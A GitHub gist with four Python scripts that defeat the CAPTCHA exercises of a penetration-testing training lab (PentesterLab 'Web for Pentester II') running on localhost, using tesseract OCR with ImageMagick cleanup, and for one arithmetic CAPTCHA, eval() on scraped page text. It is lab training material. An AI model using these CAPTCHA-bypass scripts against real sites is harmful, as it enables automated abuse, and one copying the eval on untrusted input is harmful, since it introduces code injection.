Last active
April 23, 2017 18:41
-
-
Save jaybosamiya/8b0c00b0b9a37e5cac0c to your computer and use it in GitHub Desktop.
Breaks captchas of PentesterLab https://www.pentesterlab.com/exercises/web_for_pentester_II/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python | |
| import requests | |
| import shutil | |
| import subprocess | |
| import os | |
| url_form = 'http://localhost:31337/captcha/example6/' | |
| url_submit = url_form + 'submit' | |
| captcha_image_path = 'captcha_image.png' | |
| s = requests.session() | |
| response = s.get(url_form) | |
| image_url = url_form + response.text[response.text.index('captcha.png'):][:32] | |
| print "[+] Got image url %s" % image_url | |
| response = s.get(image_url, stream=True) | |
| with open(captcha_image_path, 'wb+') as f: | |
| response.raw.decode_content = True | |
| shutil.copyfileobj(response.raw, f) | |
| print "[+] Got image. Saved image %s" % captcha_image_path | |
| tesseract_output = subprocess.check_output(['/usr/bin/tesseract', captcha_image_path, 'stdout', '-psm 8'], stderr=open(os.devnull, 'wb')).strip() # The '-psm 8' guarantees one word answer | |
| print "[+] Ran tesseract. Received output %s." % repr(tesseract_output) | |
| captcha_text = tesseract_output | |
| response = s.get(url_submit, params={'captcha':captcha_text, 'submit':'Submit Query'}, cookies=s.cookies) | |
| if 'Success' in response.text: | |
| print "[+] Successfully submitted captcha" | |
| else: | |
| print "[-] Unsuccessfull in breaking captcha" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python | |
| import requests | |
| import shutil | |
| import subprocess | |
| import os | |
| url_form = 'http://localhost:31337/captcha/example7/' | |
| url_submit = url_form + 'submit' | |
| captcha_image_path = 'captcha_image.png' | |
| s = requests.session() | |
| response = s.get(url_form) | |
| image_url = url_form + response.text[response.text.index('captcha.png'):][:32] | |
| print "[+] Got image url %s" % image_url | |
| response = s.get(image_url, stream=True) | |
| with open(captcha_image_path, 'wb+') as f: | |
| response.raw.decode_content = True | |
| shutil.copyfileobj(response.raw, f) | |
| print "[+] Got image. Saved image %s" % captcha_image_path | |
| subprocess.call(['/usr/bin/convert', captcha_image_path, '-white-threshold', '1', captcha_image_path]) | |
| print "[+] Cleaned image" | |
| tesseract_output = subprocess.check_output(['/usr/bin/tesseract', captcha_image_path, 'stdout', '-psm 8'], stderr=open(os.devnull, 'wb')).strip() # The '-psm 8' guarantees one word answer | |
| print "[+] Ran tesseract. Received output %s." % repr(tesseract_output) | |
| captcha_text = tesseract_output.lower().replace(' ','') | |
| response = s.get(url_submit, params={'captcha':captcha_text, 'submit':'Submit Query'}, cookies=s.cookies) | |
| if 'Success' in response.text: | |
| print "[+] Successfully submitted captcha %s" % repr(captcha_text) | |
| else: | |
| print "[-] Unsuccessfull in breaking captcha" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python | |
| import requests | |
| import shutil | |
| import subprocess | |
| import os | |
| url_form = 'http://localhost:31337/captcha/example8/' | |
| url_submit = url_form + 'submit' | |
| captcha_image_path = 'captcha_image.png' | |
| s = requests.session() | |
| response = s.get(url_form) | |
| image_url = url_form + response.text[response.text.index('captcha.png'):][:32] | |
| print "[+] Got image url %s" % image_url | |
| response = s.get(image_url, stream=True) | |
| with open(captcha_image_path, 'wb+') as f: | |
| response.raw.decode_content = True | |
| shutil.copyfileobj(response.raw, f) | |
| print "[+] Got image. Saved image %s" % captcha_image_path | |
| subprocess.call(['/usr/bin/convert', captcha_image_path, '-white-threshold', '30000', '-implode', '-0.65', captcha_image_path]) | |
| print "[+] Cleaned image" | |
| tesseract_output = subprocess.check_output(['/usr/bin/tesseract', captcha_image_path, 'stdout', '-psm 8'], stderr=open(os.devnull, 'wb')).strip() # The '-psm 8' guarantees one word answer | |
| print "[+] Ran tesseract. Received output %s." % repr(tesseract_output) | |
| captcha_text = tesseract_output.lower().replace(' ','') | |
| response = s.get(url_submit, params={'captcha':captcha_text, 'submit':'Submit Query'}, cookies=s.cookies) | |
| if 'Success' in response.text: | |
| print "[+] Successfully submitted captcha %s" % repr(captcha_text) | |
| else: | |
| print "[-] Unsuccessfull in breaking captcha" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python | |
| import requests | |
| url_form = 'http://localhost:31337/captcha/example9/' | |
| url_submit = url_form + 'submit' | |
| s = requests.session() | |
| response = s.get(url_form) | |
| captcha = response.text[response.text.index('<form action="submit" action="get">')+38:response.text.index('<input type="text" name="captcha"/>')-3] | |
| print "[+] Found captcha '%s'" % captcha | |
| captcha_text = str(eval(captcha)) | |
| print "[+] Solved captcha %s" % captcha_text | |
| response = s.get(url_submit, params={'captcha':captcha_text, 'submit':'Submit Query'}, cookies=s.cookies) | |
| if 'Success' in response.text: | |
| print "[+] Successfully submitted captcha %s" % repr(captcha_text) | |
| else: | |
| print "[-] Unsuccessfull in breaking captcha" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment